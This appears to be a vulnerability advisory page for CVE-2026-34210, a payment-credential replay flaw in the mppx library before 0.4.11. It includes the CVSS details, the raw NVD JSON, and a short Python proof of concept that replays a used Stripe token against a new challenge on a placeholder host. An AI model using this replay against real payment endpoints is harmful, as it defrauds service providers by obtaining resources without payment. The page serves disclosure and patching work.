Security Vulnerability Report
CVE-2026-34210 CVSS 8.1 HIGH

CVE-2026-34210

Published: 2026-03-31 15:16:18
Last Modified: 2026-04-03 16:17:50

Description

mppx is a TypeScript interface for machine payments protocol. Prior to version 0.4.11, the stripe/charge payment method did not check Stripe's Idempotent-Replayed response header when creating PaymentIntents. An attacker could replay a valid credential containing the same spt token against a new challenge, and the server would accept the replayed Stripe PaymentIntent as a new successful payment without actually charging the customer again. This allowed an attacker to pay once and consume unlimited resources by replaying the credential. This issue has been patched in version 0.4.11.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wevm:mppx:*:*:*:*:*:node.js:*:* - VULNERABLE
mppx < 0.4.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""Conceptual illustration of CVE-2026-34210 (mppx < 0.4.11).

The script re-submits a previously accepted stripe/charge credential (an spt
token) against a different challenge. Vulnerable mppx versions accepted the
resulting Stripe PaymentIntent as a fresh successful payment because they did
not inspect Stripe's Idempotent-Replayed response header; 0.4.11 and later
reject the replay. Every value below is a constructed placeholder.
"""
import requests

# Credential from an earlier, legitimately paid request (placeholder value).
REUSED_CREDENTIAL = "spt_valid_token_abc123"

# Payment-verification endpoint under test (placeholder host).
VERIFY_ENDPOINT = "https://victim-api.com/mppx/verify"

# A challenge the credential was never paid for.
UNPAID_CHALLENGE = "resource_challenge_xyz"


def build_replay_body(challenge, credential):
    """Return the request body pairing an already-used credential with a new challenge."""
    return {
        "challenge": challenge,
        "method": "stripe",
        "credential": credential,
    }


print("[*] Attempting to replay payment credential...")
reply = requests.post(
    VERIFY_ENDPOINT,
    json=build_replay_body(UNPAID_CHALLENGE, REUSED_CREDENTIAL),
)

# A 200 means the server treated the replayed PaymentIntent as a new payment --
# exactly the condition the Idempotent-Replayed check in 0.4.11 closes.
if reply.status_code != 200:
    print("[-] Replay failed.")
else:
    print("[+] Success! Server accepted the replayed credential.")
    print("[+] Resource granted without charging the account again.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34210", "sourceIdentifier": "[email protected]", "published": "2026-03-31T15:16:18.207", "lastModified": "2026-04-03T16:17:49.840", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mppx is a TypeScript interface for machine payments protocol. Prior to version 0.4.11, the stripe/charge payment method did not check Stripe's Idempotent-Replayed response header when creating PaymentIntents. An attacker could replay a valid credential containing the same spt token against a new challenge, and the server would accept the replayed Stripe PaymentIntent as a new successful payment without actually charging the customer again. This allowed an attacker to pay once and consume unlimited resources by replaying the credential. This issue has been patched in version 0.4.11."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": 
"NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-697"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wevm:mppx:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.4.11", "matchCriteriaId": "72D62258-34DE-453F-8DFC-D25FA285D537"}]}]}], "references": [{"url": "https://github.com/wevm/mppx/commit/b2b1a0b60506fc71aa80b8a025084949dca1a994", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wevm/mppx/releases/tag/[email protected]", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wevm/mppx/security/advisories/GHSA-8mhj-rffc-rcvw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}